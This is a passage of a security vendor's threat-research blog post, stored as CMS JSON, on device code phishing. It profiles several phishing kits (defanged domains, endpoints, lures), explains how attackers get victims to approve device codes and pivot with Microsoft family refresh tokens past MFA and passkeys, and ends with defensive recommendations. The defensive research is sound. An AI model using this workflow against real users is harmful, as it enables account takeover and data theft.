AS132203)",[],{},{"nodeType":1258,"data":5410,"content":5411},{},[5412,5416,5419,5423],{"nodeType":1257,"value":4371,"marks":5413,"data":5415},[5414],{"type":1318},{},{"nodeType":1257,"value":4376,"marks":5417,"data":5418},[],{},{"nodeType":1257,"value":5099,"marks":5420,"data":5422},[5421],{"type":1318},{},{"nodeType":1257,"value":5424,"marks":5425,"data":5426},"(null)",[],{},{"nodeType":4295,"data":5428,"content":5429},{},[5430,5440],{"nodeType":4299,"data":5431,"content":5432},{},[5433],{"nodeType":1258,"data":5434,"content":5435},{},[5436],{"nodeType":1257,"value":4414,"marks":5437,"data":5439},[5438],{"type":1318},{},{"nodeType":4299,"data":5441,"content":5442},{},[5443,5450],{"nodeType":1258,"data":5444,"content":5445},{},[5446],{"nodeType":1257,"value":5447,"marks":5448,"data":5449},"POST /api/handler.php ",[],{},{"nodeType":1258,"data":5451,"content":5452},{},[5453],{"nodeType":1257,"value":5454,"marks":5455,"data":5456},"(actions: device_code_generate, device_code_poll_public)",[],{},{"nodeType":4295,"data":5458,"content":5459},{},[5460,5470],{"nodeType":4299,"data":5461,"content":5462},{},[5463],{"nodeType":1258,"data":5464,"content":5465},{},[5466],{"nodeType":1257,"value":4466,"marks":5467,"data":5469},[5468],{"type":1318},{},{"nodeType":4299,"data":5471,"content":5472},{},[5473],{"nodeType":1258,"data":5474,"content":5475},{},[5476],{"nodeType":1257,"value":5477,"marks":5478,"data":5479},"DocuSign \"Salary Adjustment Document — 2026\", Microsoft banner · HR Department 
sender",[],{},{"nodeType":4295,"data":5481,"content":5482},{},[5483,5493],{"nodeType":4299,"data":5484,"content":5485},{},[5486],{"nodeType":1258,"data":5487,"content":5488},{},[5489],{"nodeType":1257,"value":4689,"marks":5490,"data":5492},[5491],{"type":1318},{},{"nodeType":4299,"data":5494,"content":5495},{},[5496],{"nodeType":1258,"data":5497,"content":5498},{},[5499],{"nodeType":1257,"value":5500,"marks":5501,"data":5502},"salaryadjustment-2afb52.pmb6fefc52b3f9aa5c2dbf[.]workers.dev",[],{},{"nodeType":1335,"data":5504,"content":5508},{"target":5505},{"sys":5506},{"id":5507,"type":1340,"linkType":1341},"6xiTDHStbiJh7LMhjAZcPd",[],{"nodeType":1307,"data":5510,"content":5511},{},[],{"nodeType":1468,"data":5513,"content":5514},{},[5515],{"nodeType":1257,"value":5516,"marks":5517,"data":5519},"“PAPRIKA”",[5518],{"type":1318},{},{"nodeType":4291,"data":5521,"content":5522},{},[5523,5546,5569,5592],{"nodeType":4295,"data":5524,"content":5525},{},[5526,5536],{"nodeType":4299,"data":5527,"content":5528},{},[5529],{"nodeType":1258,"data":5530,"content":5531},{},[5532],{"nodeType":1257,"value":4306,"marks":5533,"data":5535},[5534],{"type":1318},{},{"nodeType":4299,"data":5537,"content":5538},{},[5539],{"nodeType":1258,"data":5540,"content":5541},{},[5542],{"nodeType":1257,"value":5543,"marks":5544,"data":5545},"AWS S3 hosting",[],{},{"nodeType":4295,"data":5547,"content":5548},{},[5549,5559],{"nodeType":4299,"data":5550,"content":5551},{},[5552],{"nodeType":1258,"data":5553,"content":5554},{},[5555],{"nodeType":1257,"value":4414,"marks":5556,"data":5558},[5557],{"type":1318},{},{"nodeType":4299,"data":5560,"content":5561},{},[5562],{"nodeType":1258,"data":5563,"content":5564},{},[5565],{"nodeType":1257,"value":5566,"marks":5567,"data":5568},"POST 
/api/v1/loader",[],{},{"nodeType":4295,"data":5570,"content":5571},{},[5572,5582],{"nodeType":4299,"data":5573,"content":5574},{},[5575],{"nodeType":1258,"data":5576,"content":5577},{},[5578],{"nodeType":1257,"value":4466,"marks":5579,"data":5581},[5580],{"type":1318},{},{"nodeType":4299,"data":5583,"content":5584},{},[5585],{"nodeType":1258,"data":5586,"content":5587},{},[5588],{"nodeType":1257,"value":5589,"marks":5590,"data":5591},"MS login clone (\"Sign in to your account\"), \"Office 365\" branding, fake \"Powered by Okta\" footer",[],{},{"nodeType":4295,"data":5593,"content":5594},{},[5595,5605],{"nodeType":4299,"data":5596,"content":5597},{},[5598],{"nodeType":1258,"data":5599,"content":5600},{},[5601],{"nodeType":1257,"value":4689,"marks":5602,"data":5604},[5603],{"type":1318},{},{"nodeType":4299,"data":5606,"content":5607},{},[5608],{"nodeType":1258,"data":5609,"content":5610},{},[5611],{"nodeType":1257,"value":5612,"marks":5613,"data":5614},"redirect-523346-d95027ec[.]s3.amazonaws.com",[],{},{"nodeType":1335,"data":5616,"content":5620},{"target":5617},{"sys":5618},{"id":5619,"type":1340,"linkType":1341},"6WFXqUDzcJHKWSwVIcDZAf",[],{"nodeType":1307,"data":5622,"content":5623},{},[],{"nodeType":1468,"data":5625,"content":5626},{},[5627],{"nodeType":1257,"value":5628,"marks":5629,"data":5631},"“DCSTATUS”",[5630],{"type":1318},{},{"nodeType":4291,"data":5633,"content":5634},{},[5635,5657,5680,5703],{"nodeType":4295,"data":5636,"content":5637},{},[5638,5648],{"nodeType":4299,"data":5639,"content":5640},{},[5641],{"nodeType":1258,"data":5642,"content":5643},{},[5644],{"nodeType":1257,"value":4306,"marks":5645,"data":5647},[5646],{"type":1318},{},{"nodeType":4299,"data":5649,"content":5650},{},[5651],{"nodeType":1258,"data":5652,"content":5653},{},[5654],{"nodeType":1257,"value":4591,"marks":5655,"data":5656},[],{},{"nodeType":4295,"data":5658,"content":5659},{},[5660,5670],{"nodeType":4299,"data":5661,"content":5662},{},[5663],{"nodeType":1258,"data":5664,"conte
nt":5665},{},[5666],{"nodeType":1257,"value":4414,"marks":5667,"data":5669},[5668],{"type":1318},{},{"nodeType":4299,"data":5671,"content":5672},{},[5673],{"nodeType":1258,"data":5674,"content":5675},{},[5676],{"nodeType":1257,"value":5677,"marks":5678,"data":5679},"GET /dc/status/{base64url_sid}",[],{},{"nodeType":4295,"data":5681,"content":5682},{},[5683,5693],{"nodeType":4299,"data":5684,"content":5685},{},[5686],{"nodeType":1258,"data":5687,"content":5688},{},[5689],{"nodeType":1257,"value":4466,"marks":5690,"data":5692},[5691],{"type":1318},{},{"nodeType":4299,"data":5694,"content":5695},{},[5696],{"nodeType":1258,"data":5697,"content":5698},{},[5699],{"nodeType":1257,"value":5700,"marks":5701,"data":5702},"Generic \"Microsoft 365 - Secure Access\" verification page",[],{},{"nodeType":4295,"data":5704,"content":5705},{},[5706,5716],{"nodeType":4299,"data":5707,"content":5708},{},[5709],{"nodeType":1258,"data":5710,"content":5711},{},[5712],{"nodeType":1257,"value":4689,"marks":5713,"data":5715},[5714],{"type":1318},{},{"nodeType":4299,"data":5717,"content":5718},{},[5719],{"nodeType":1258,"data":5720,"content":5721},{},[5722],{"nodeType":1257,"value":5723,"marks":5724,"data":5725},"owa[.]apmmacleans[.]ca",[],{},{"nodeType":1335,"data":5727,"content":5731},{"target":5728},{"sys":5729},{"id":5730,"type":1340,"linkType":1341},"ugYhHeXY1lQdKooALmrIs",[],{"nodeType":1307,"data":5733,"content":5734},{},[],{"nodeType":1468,"data":5736,"content":5737},{},[5738],{"nodeType":1257,"value":5739,"marks":5740,"data":5742},"“DOLCE”",[5741],{"type":1318},{},{"nodeType":1335,"data":5744,"content":5748},{"target":5745},{"sys":5746},{"id":5747,"type":1340,"linkType":1341},"7TzU6kk01Un45NB0buEz2",[],{"nodeType":4291,"data":5750,"content":5751},{},[5752,5775,5813,5836,5859],{"nodeType":4295,"data":5753,"content":5754},{},[5755,5765],{"nodeType":4299,"data":5756,"content":5757},{},[5758],{"nodeType":1258,"data":5759,"content":5760},{},[5761],{"nodeType":1257,"value":4306,"marks":576
2,"data":5764},[5763],{"type":1318},{},{"nodeType":4299,"data":5766,"content":5767},{},[5768],{"nodeType":1258,"data":5769,"content":5770},{},[5771],{"nodeType":1257,"value":5772,"marks":5773,"data":5774},"Microsoft PowerApps hosting",[],{},{"nodeType":4295,"data":5776,"content":5777},{},[5778,5788],{"nodeType":4299,"data":5779,"content":5780},{},[5781],{"nodeType":1258,"data":5782,"content":5783},{},[5784],{"nodeType":1257,"value":4330,"marks":5785,"data":5787},[5786],{"type":1318},{},{"nodeType":4299,"data":5789,"content":5790},{},[5791,5802],{"nodeType":1258,"data":5792,"content":5793},{},[5794,5798],{"nodeType":1257,"value":4766,"marks":5795,"data":5797},[5796],{"type":1318},{},{"nodeType":1257,"value":5799,"marks":5800,"data":5801},"34.53.159.84 (Google Cloud AS396982)",[],{},{"nodeType":1258,"data":5803,"content":5804},{},[5805,5809],{"nodeType":1257,"value":4371,"marks":5806,"data":5808},[5807],{"type":1318},{},{"nodeType":1257,"value":5810,"marks":5811,"data":5812}," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",[],{},{"nodeType":4295,"data":5814,"content":5815},{},[5816,5826],{"nodeType":4299,"data":5817,"content":5818},{},[5819],{"nodeType":1258,"data":5820,"content":5821},{},[5822],{"nodeType":1257,"value":4414,"marks":5823,"data":5825},[5824],{"type":1318},{},{"nodeType":4299,"data":5827,"content":5828},{},[5829],{"nodeType":1258,"data":5830,"content":5831},{},[5832],{"nodeType":1257,"value":5833,"marks":5834,"data":5835},"GET /api/generatecode (CloudFront)",[],{},{"nodeType":4295,"data":5837,"content":5838},{},[5839,5849],{"nodeType":4299,"data":5840,"content":5841},{},[5842],{"nodeType":1258,"data":5843,"content":5844},{},[5845],{"nodeType":1257,"value":4466,"marks":5846,"data":5848},[5847],{"type":1318},{},{"nodeType":4299,"data":5850,"content":5851},{},[5852],{"nodeType":1258,"data":5853,"content":5854},{},[5855],{"nodeType":1257,"value":5856,"marks":5857,"data":5858},"Dolce & 
Gabbana branded, Italian language, MS account verification",[],{},{"nodeType":4295,"data":5860,"content":5861},{},[5862,5872],{"nodeType":4299,"data":5863,"content":5864},{},[5865],{"nodeType":1258,"data":5866,"content":5867},{},[5868],{"nodeType":1257,"value":4689,"marks":5869,"data":5871},[5870],{"type":1318},{},{"nodeType":4299,"data":5873,"content":5874},{},[5875],{"nodeType":1258,"data":5876,"content":5877},{},[5878],{"nodeType":1257,"value":5879,"marks":5880,"data":5881},"data-migration-dolcegabbana[.]powerappsportals.com",[],{},{"nodeType":1335,"data":5883,"content":5887},{"target":5884},{"sys":5885},{"id":5886,"type":1340,"linkType":1341},"4ayQDvpf5NNOBrj9wZZRiO",[],{"nodeType":3714,"data":5889,"content":5890},{},[5891],{"nodeType":1258,"data":5892,"content":5893},{},[5894],{"nodeType":1257,"value":5895,"marks":5896,"data":5897},"Clearly, device code phishing has entered mainstream adoption and we should be prepared for a lot more of it in future. So how does it work, and why is it so effective?",[],{},{"nodeType":1307,"data":5899,"content":5900},{},[],{"nodeType":1311,"data":5902,"content":5903},{},[5904],{"nodeType":1257,"value":5905,"marks":5906,"data":5908},"Device code phishing under the hood",[5907],{"type":1318},{},{"nodeType":1258,"data":5910,"content":5911},{},[5912,5916],{"nodeType":1257,"value":5913,"marks":5914,"data":5915},"The attacker POSTs to the authorization server's device authorization endpoint with its client_id (i.e. an application ID) and requested scopes or resources. The server responds with a device_code (used for polling), a user_code, a verification_uri, an expires_in value, and a polling interval. The user visits the URL, enters the code and approves the request. Meanwhile, the device polls the token endpoint. Once approved, the server returns an access token, a refresh token (if offline_access was requested), and an ID token (if openid was included). 
",[],{},{"nodeType":1257,"value":5917,"marks":5918,"data":5920},"The attacker now has API access to the victim's account. ",[5919],{"type":1318},{},{"nodeType":1258,"data":5922,"content":5923},{},[5924],{"nodeType":1257,"value":5925,"marks":5926,"data":5927},"Broadly, this gives the attacker a comparable level of control to a “normal” phishing attack (with conditions based on the scopes granted and specific app being targeted) while API access grants additional capabilities beyond standard browser sessions. When combined with other techniques, this access can be exchanged to open normal browser app sessions and access SSO connected apps (e.g. the PRT escalation technique for Microsoft that I mentioned in earlier research).",[],{},{"nodeType":1335,"data":5929,"content":5933},{"target":5930},{"sys":5931},{"id":5932,"type":1340,"linkType":1341},"1x7Lip7JdY2xlHKKurT7qJ",[],{"nodeType":1258,"data":5935,"content":5936},{},[5937],{"nodeType":1257,"value":5938,"marks":5939,"data":5940},"At this point, you can achieve a number of objectives both inside the app ecosystem and across SSO connected apps — e.g. data theft, disruption, and ultimately extortion.",[],{},{"nodeType":1258,"data":5942,"content":5943},{},[5944,5948,5953,5957],{"nodeType":1257,"value":5945,"marks":5946,"data":5947},"Critically, the initial request to generate a device code is typically ",[],{},{"nodeType":1257,"value":5949,"marks":5950,"data":5952},"unauthenticated",[5951],{"type":1318},{},{"nodeType":1257,"value":5954,"marks":5955,"data":5956}," across all providers — ",[],{},{"nodeType":1257,"value":5958,"marks":5959,"data":5961},"anyone can generate one, from any machine, without proving any relationship to the target organization.",[5960],{"type":1318},{},{"nodeType":1258,"data":5963,"content":5964},{},[5965,5969,5974],{"nodeType":1257,"value":5966,"marks":5967,"data":5968},"So, the attacker has to deliver a set of instructions via a phishing channel (e.g. 
email, social media DM, corp IM platform, and so on) with a device code that they have generated. The victim then enters this code on the ",[],{},{"nodeType":1257,"value":5970,"marks":5971,"data":5973},"legitimate device code login page",[5972],{"type":1318},{},{"nodeType":1257,"value":5975,"marks":5976,"data":5977}," for that app and issues the tokens to the attacker.",[],{},{"nodeType":1335,"data":5979,"content":5983},{"target":5980},{"sys":5981},{"id":5982,"type":1340,"linkType":1341},"1txUYuQjH9FlbDGTo8AbZB",[],{"nodeType":1468,"data":5985,"content":5986},{},[5987],{"nodeType":1257,"value":5988,"marks":5989,"data":5991},"First-party vs. third-party apps",[5990],{"type":1318},{},{"nodeType":1258,"data":5993,"content":5994},{},[5995,6000,6004,6014],{"nodeType":1257,"value":5996,"marks":5997,"data":5999},"First-party applications",[5998],{"type":1318},{},{"nodeType":1257,"value":6001,"marks":6002,"data":6003}," are commonly abused in Microsoft-targeted attacks. These are ",[],{},{"nodeType":1364,"data":6005,"content":6007},{"uri":6006},"https://gist.github.com/dafthack/2c0bbcac72b10c1ee205d1dd2fed3fe7",[6008],{"nodeType":1257,"value":6009,"marks":6010,"data":6013},"real Microsoft applications",[6011,6012],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":6015,"marks":6016,"data":6017}," registered in every Entra ID tenant. Not only are they allowed by default (unlike third-party apps that are often subject to additional restrictions and require additional tenant-level consent before they can be accessed by a user), they come with pre-consented permissions, and can even access undocumented “legacy” scopes. ",[],{},{"nodeType":1258,"data":6019,"content":6020},{},[6021],{"nodeType":1257,"value":6022,"marks":6023,"data":6024},"Many Microsoft first-party apps also belong to the Family of Client IDs (FOCI), meaning a refresh token obtained for one family member can be exchanged for access tokens to other family members without re-authentication. 
This means that an attacker can silently pivot to other apps and APIs from a single phished session.",[],{},{"nodeType":1335,"data":6026,"content":6030},{"target":6027},{"sys":6028},{"id":6029,"type":1340,"linkType":1341},"ejNSC76jge1p1zzz9wwiG",[],{"nodeType":1258,"data":6032,"content":6033},{},[6034],{"nodeType":1257,"value":6035,"marks":6036,"data":6037},"In other cases, third-party applications are leveraged. This doesn’t mean these are fresh, attacker-created apps, however (though it’s easier than ever for attackers to spin up their own OAuth apps using AI tools). They can simply be attacker-controlled instances of otherwise legitimate apps. ",[],{},{"nodeType":1307,"data":6039,"content":6040},{},[],{"nodeType":1311,"data":6042,"content":6043},{},[6044],{"nodeType":1257,"value":6045,"marks":6046,"data":6048},"Why device code phishing is so dangerous",[6047],{"type":1318},{},{"nodeType":1468,"data":6050,"content":6051},{},[6052],{"nodeType":1257,"value":6053,"marks":6054,"data":6056},"Device code phishing bypasses authentication controls (including passkeys)",[6055],{"type":1318},{},{"nodeType":1258,"data":6058,"content":6059},{},[6060,6064,6069,6073],{"nodeType":1257,"value":6061,"marks":6062,"data":6063},"A device code phishing attack ",[],{},{"nodeType":1257,"value":6065,"marks":6066,"data":6068},"cannot be prevented with authentication controls",[6067],{"type":1318},{},{"nodeType":1257,"value":6070,"marks":6071,"data":6072},". This includes all forms of MFA and ",[],{},{"nodeType":1257,"value":6074,"marks":6075,"data":6077},"even “phishing-resistant” authentication methods such as passkeys. ",[6076],{"type":1318},{},{"nodeType":1258,"data":6079,"content":6080},{},[6081,6086,6090,6095],{"nodeType":1257,"value":6082,"marks":6083,"data":6085},"The device code authorization is effectively performed post-authentication. 
",[6084],{"type":1318},{},{"nodeType":1257,"value":6087,"marks":6088,"data":6089},"If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. ",[],{},{"nodeType":1257,"value":6091,"marks":6092,"data":6094},"No password or MFA required. ",[6093],{"type":1318},{},{"nodeType":1257,"value":6096,"marks":6097,"data":6098},"You can see an example in the video below.",[],{},{"nodeType":1335,"data":6100,"content":6103},{"target":6101},{"sys":6102},{"id":5344,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":6105,"content":6106},{},[6107],{"nodeType":1257,"value":6108,"marks":6109,"data":6110},"Even if you do have to sign in again (because you're not already signed in for some reason), the attack still works because it isn't targeting the login — it's targeting the authorization layer instead.",[],{},{"nodeType":1258,"data":6112,"content":6113},{},[6114],{"nodeType":1257,"value":6115,"marks":6116,"data":6117},"This is what makes device code phishing different to other standard phishing methods like AiTM phishing (and arguably even more effective in environments with strict identity control enforcement). ",[],{},{"nodeType":1468,"data":6119,"content":6120},{},[6121],{"nodeType":1257,"value":6122,"marks":6123,"data":6125},"Device code logins are a feature, not a vulnerability, making attacks difficult to block",[6124],{"type":1318},{},{"nodeType":1258,"data":6127,"content":6128},{},[6129,6133,6138],{"nodeType":1257,"value":6130,"marks":6131,"data":6132},"Device code authorization is a legitimate mechanism that is regularly used in an enterprise environment, particularly for CLI logins. ",[],{},{"nodeType":1257,"value":6134,"marks":6135,"data":6137},"This is a problem for security teams because the phishing attack effectively happens on the legitimate site",[6136],{"type":1318},{},{"nodeType":1257,"value":6139,"marks":6140,"data":6141},". 
The code is delivered to the victim via message or webpage, but the attack itself only happens when that code is entered onto the real device code login page.",[],{},{"nodeType":1258,"data":6143,"content":6144},{},[6145],{"nodeType":1257,"value":6146,"marks":6147,"data":6148},"Since there’s no traditional phishing payload being delivered on the attacker’s webpage, these sites are more resistant to detection and less likely to be flagged by email and network analysis. And in many cases, there’s no email (or webpage) to analyze at all.",[],{},{"nodeType":1258,"data":6150,"content":6151},{},[6152,6156,6165],{"nodeType":1257,"value":6153,"marks":6154,"data":6155},"Various apps can be a target, all of which implement the device code flow in slightly different ways, and also offer different levels of control and default security around these logins. For example, Google Workspace is a significantly lower risk target than Microsoft, GitHub, or AWS because ",[],{},{"nodeType":1364,"data":6157,"content":6159},{"uri":6158},"https://developers.google.com/identity/protocols/oauth2/limited-input-device",[6160],{"nodeType":1257,"value":6161,"marks":6162,"data":6164},"Google explicitly limits which scopes are available to the device code flow",[6163],{"type":1372},{},{"nodeType":1257,"value":6166,"marks":6167,"data":6168},". ",[],{},{"nodeType":1307,"data":6170,"content":6171},{},[],{"nodeType":1311,"data":6173,"content":6174},{},[6175],{"nodeType":1257,"value":6176,"marks":6177,"data":6179},"Security recommendations",[6178],{"type":1318},{},{"nodeType":1258,"data":6181,"content":6182},{},[6183],{"nodeType":1257,"value":6184,"marks":6185,"data":6186},"Security teams need to consider the risk posed by device code phishing across multiple apps where device code authorization grants are common, particularly for developers and technical users. 
",[],{},{"nodeType":1258,"data":6188,"content":6189},{},[6190],{"nodeType":1257,"value":6191,"marks":6192,"data":6193},"In an ideal world, you would simply block device code logins. But this can’t be done without causing serious disruption in some environments, while some apps simply don’t provide the tools required to do so. For example, device code is the default CLI sign-in method for GitHub. Developer-heavy organizations are likely to encounter higher levels of legitimate use.",[],{},{"nodeType":1258,"data":6195,"content":6196},{},[6197,6201,6210,6214,6219,6223,6228,6232,6237],{"nodeType":1257,"value":6198,"marks":6199,"data":6200},"Microsoft arguably offers the strongest control options (other than Google, who negate it right out of the gate), though they do require a fair amount of work. ",[],{},{"nodeType":1364,"data":6202,"content":6204},{"uri":6203},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/new-microsoft-managed-policies-to-raise-your-identity-security-posture/4286758",[6205],{"nodeType":1257,"value":6206,"marks":6207,"data":6209},"Microsoft now explicitly recommends",[6208],{"type":1372},{},{"nodeType":1257,"value":6211,"marks":6212,"data":6213}," blocking device code flow for tenants that haven't used it in the past 25 days. Their guidance is to create a custom CA policy: target relevant users, set the ",[],{},{"nodeType":1257,"value":6215,"marks":6216,"data":6218},"Authentication Flows",[6217],{"type":1318},{},{"nodeType":1257,"value":6220,"marks":6221,"data":6222}," condition to block ",[],{},{"nodeType":1257,"value":6224,"marks":6225,"data":6227},"Device Code Flow",[6226],{"type":1318},{},{"nodeType":1257,"value":6229,"marks":6230,"data":6231},", and set the grant control to ",[],{},{"nodeType":1257,"value":6233,"marks":6234,"data":6236},"Block Access",[6235],{"type":1318},{},{"nodeType":1257,"value":6238,"marks":6239,"data":6240},". Deploy in report-only mode first to identify any legitimate device code usage. 
",[],{},{"nodeType":1335,"data":6242,"content":6246},{"target":6243},{"sys":6244},{"id":6245,"type":1340,"linkType":1341},"mQIj2o9xRzkZYKNmanB25",[],{"nodeType":1258,"data":6248,"content":6249},{},[6250],{"nodeType":1257,"value":6251,"marks":6252,"data":6253},"For other apps, you’re mainly limited to monitoring and response. Ensuring you’re getting authentication logs for these apps is vital, and searching for unusual access patterns (e.g. unusual login protocols, having different IPs for the authorization grant and subsequent account activity). ",[],{},{"nodeType":1307,"data":6255,"content":6256},{},[],{"nodeType":1311,"data":6258,"content":6259},{},[6260],{"nodeType":1257,"value":6261,"marks":6262,"data":6264},"How Push Security can help",[6263],{"type":1318},{},{"nodeType":1258,"data":6266,"content":6267},{},[6268],{"nodeType":1257,"value":6269,"marks":6270,"data":6271},"Push customers can use our browser-based capabilities to overcome the limitations of app-level controls and detect, intercept, and shut down attacks in real time. ",[],{},{"nodeType":1258,"data":6273,"content":6274},{},[6275],{"nodeType":1257,"value":6276,"marks":6277,"data":6278},"Our research team is already tracking multiple device code phishing campaigns and toolkits, including the EvilTokens kit. Blocking controls are already in place to prevent customers from interacting with malicious pages that match our detections for these new toolkits, ensuring that these pages can be identified and blocked in real time regardless of the infrastructure. 
",[],{},{"nodeType":1258,"data":6280,"content":6281},{},[6282,6286,6295],{"nodeType":1257,"value":6283,"marks":6284,"data":6285},"Using Push you can also ",[],{},{"nodeType":1364,"data":6287,"content":6289},{"uri":6288},"https://pushsecurity.com/help/can-i-use-push-to-help-protect-against-device-code-phishing-scenarios/",[6290],{"nodeType":1257,"value":6291,"marks":6292,"data":6294},"configure in-browser warnings",[6293],{"type":1372},{},{"nodeType":1257,"value":6296,"marks":6297,"data":6298}," whenever a user accesses a URL used for device code logins. This provides universal, last-mile protection against even ‘zero-day’ device code phishing attacks using previously unidentified toolkits.  ",[],{},{"nodeType":1335,"data":6300,"content":6304},{"target":6301},{"sys":6302},{"id":6303,"type":1340,"linkType":1341},"3JsbGaOKSS3INzBUJpoh1W",[],{"nodeType":1258,"data":6306,"content":6307},{},[6308],{"nodeType":1257,"value":6309,"marks":6310,"data":6311},"When a user visits those URLs, Push will also emit a webhook event that the banner was shown and acknowledged. If a user opts to proceed, you can treat this as a high-fidelity alert for your security team to investigate, providing app-agnostic telemetry that may not already be provided in your logs from that particular vendor. You can also simply use Push to block users from accessing device login pages if you’re confident that disruption won’t be caused. ",[],{},{"nodeType":1468,"data":6313,"content":6314},{},[6315],{"nodeType":1257,"value":6316,"marks":6317,"data":6319},"Learn more about Push",[6318],{"type":1318},{},{"nodeType":1258,"data":6321,"content":6322},{},[6323],{"nodeType":1257,"value":6324,"marks":6325,"data":6326},"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. 
You don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":1258,"data":6328,"content":6329},{},[6330,6333,6340,6343,6351,6354,6361],{"nodeType":1257,"value":2223,"marks":6331,"data":6332},[],{},{"nodeType":1364,"data":6334,"content":6335},{"uri":2228},[6336],{"nodeType":1257,"value":2231,"marks":6337,"data":6339},[6338],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":6341,"data":6342},[],{},{"nodeType":1364,"data":6344,"content":6345},{"uri":3737},[6346],{"nodeType":1257,"value":6347,"marks":6348,"data":6350},"view our demo library",[6349],{"type":1372},{},{"nodeType":1257,"value":3744,"marks":6352,"data":6353},[],{},{"nodeType":1364,"data":6355,"content":6356},{"uri":2241},[6357],{"nodeType":1257,"value":2244,"marks":6358,"data":6360},[6359],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":6362,"data":6363},[],{},{"entries":6365},{"hyperlink":6366,"inline":6367,"block":6368},[],[],[6369,6402,6410,6424,6438,6466,6473,6480,6486,6492,6497,6503,6506,6512,6518,6524,6530,6534,6539,6545,6550,6564,6570,6576,6590,6617,6644],{"sys":6370,"__typename":6371,"content":6372,"name":6401,"title":118},{"id":3835},"InsightTextBlockComponent",{"json":6373},{"nodeType":1259,"data":6374,"content":6375},{},[6376],{"nodeType":1258,"data":6377,"content":6378},{},[6379,6383,6388,6392,6397],{"nodeType":1257,"value":6380,"marks":6381,"data":6382},"At the start of March, we’d observed a ",[],{},{"nodeType":1257,"value":6384,"marks":6385,"data":6387},"15x",[6386],{"type":1318},{},{"nodeType":1257,"value":6389,"marks":6390,"data":6391}," increase in device code phishing pages detected by our research team this year, with multiple kits and campaigns being tracked — with the kit now identified as EvilTokens the most prominent. 
",[],{},{"nodeType":1257,"value":6393,"marks":6394,"data":6396},"That figure has now risen to 37.5x",[6395],{"type":1318},{},{"nodeType":1257,"value":6398,"marks":6399,"data":6400},". More on that later. ",[],{},"DCP IB 1",{"sys":6403,"__typename":6404,"title":6405,"caption":6405,"layoutMode":118,"file":6406},{"id":3866},"Image","Device code phishing evolution 2019-2026.",{"url":6407,"width":6408,"height":6409},"https://images.ctfassets.net/y1cdw1ablpvd/7dPjgH1qTrpBIdqE0D4D0g/91a1da0abec3bbcdd94203ce2807d94c/image11.png",1360,1160,{"sys":6411,"__typename":6371,"content":6412,"name":6423,"title":118},{"id":3976},{"json":6413},{"nodeType":1259,"data":6414,"content":6415},{},[6416],{"nodeType":1258,"data":6417,"content":6418},{},[6419],{"nodeType":1257,"value":6420,"marks":6421,"data":6422},"PhaaS is key to the adoption of new phishing tools and techniques, providing broad access to criminal operators at scale while driving up execution standards. It has been central to the continued evolution of AITM and ClickFix, and is a strong indicator of what comes next for device code phishing.",[],{},"DCP IB 2",{"sys":6425,"__typename":6371,"content":6426,"name":6437,"title":118},{"id":4136},{"json":6427},{"nodeType":1259,"data":6428,"content":6429},{},[6430],{"nodeType":1258,"data":6431,"content":6432},{},[6433],{"nodeType":1257,"value":6434,"marks":6435,"data":6436},"Since EvilTokens is the only one with public attribution, the names provided are internal codenames. The information per kit is by no means exhaustive and is likely to evolve over time. 
",[],{},"DCP IP 7",{"sys":6439,"__typename":6371,"content":6440,"name":6465,"title":118},{"id":4194},{"json":6441},{"nodeType":1259,"data":6442,"content":6443},{},[6444,6451,6458],{"nodeType":1258,"data":6445,"content":6446},{},[6447],{"nodeType":1257,"value":6448,"marks":6449,"data":6450},"Our codename for EvilTokens internally was derived from the overly descriptive page code describing its bot protection capabilities (a clear sign of vibe coding — thanks Claude!):",[],{},{"nodeType":1258,"data":6452,"content":6453},{},[6454],{"nodeType":1257,"value":6455,"marks":6456,"data":6457},"\u003C!-- FIXED ANTI-BOT SYSTEM - WON'T REDIRECT REAL USERS -->",[],{},{"nodeType":1258,"data":6459,"content":6460},{},[6461],{"nodeType":1257,"value":6462,"marks":6463,"data":6464},"\u003C!-- ENHANCED ANTI-BOT SYSTEM WITH SERVER-SIDE VALIDATION -->",[],{},"DCP IB3",{"sys":6467,"__typename":6404,"title":6468,"caption":6468,"layoutMode":118,"file":6469},{"id":4246},"Precursor A (Left) & B (Right): Different visual lures from January 2026. 
",{"url":6470,"width":6471,"height":6472},"https://images.ctfassets.net/y1cdw1ablpvd/3pfFR7ICQQqOyhGAFAj67C/6f8873d82cc7f5233a0ca9baa74f7585/image15.png",1999,773,{"sys":6474,"__typename":6404,"title":6475,"caption":6476,"layoutMode":118,"file":6477},{"id":4252},"Early ANTIBOT: First appearance of the ANTIBOT comments, mid-Jan.","Early ANTIBOT: First appearance of the ANTIBOT comments, late-Jan.",{"url":6478,"width":6471,"height":6479},"https://images.ctfassets.net/y1cdw1ablpvd/VAdFlnCF4YftsOV02wnwu/8813ea3957b65ddfb84bb8ba5fb25a55/image6.png",564,{"sys":6481,"__typename":6482,"title":6483,"arcadeDemoUrl":6484,"playText":6485},{"id":4258},"ArcadeDemo","Early ANTIBOT page load","https://demo.arcade.software/wRcvXg62Lok57ZjOKgJI?embed","20 secs",{"sys":6487,"__typename":6404,"title":6488,"caption":6488,"layoutMode":118,"file":6489},{"id":4264},"\"Courts Access\" lure with a similar security verification to Early ANTIBOT.",{"url":6490,"width":6491,"height":262},"https://images.ctfassets.net/y1cdw1ablpvd/7LEJpoif8dnub4qJw2z6kL/3b15161c9d3f2e4f7d4f323ec04f1f33/Group_687.png",3103,{"sys":6493,"__typename":6482,"title":6494,"arcadeDemoUrl":6495,"playText":6496},{"id":4270},"ANTIBOT \"Courts Access\" lure","https://demo.arcade.software/8b4YuKm1EXPmgx2q7q2D?embed","2 mins",{"sys":6498,"__typename":6404,"title":6499,"caption":6499,"layoutMode":118,"file":6500},{"id":4276},"Production ANTIBOT: Current EvilTokens 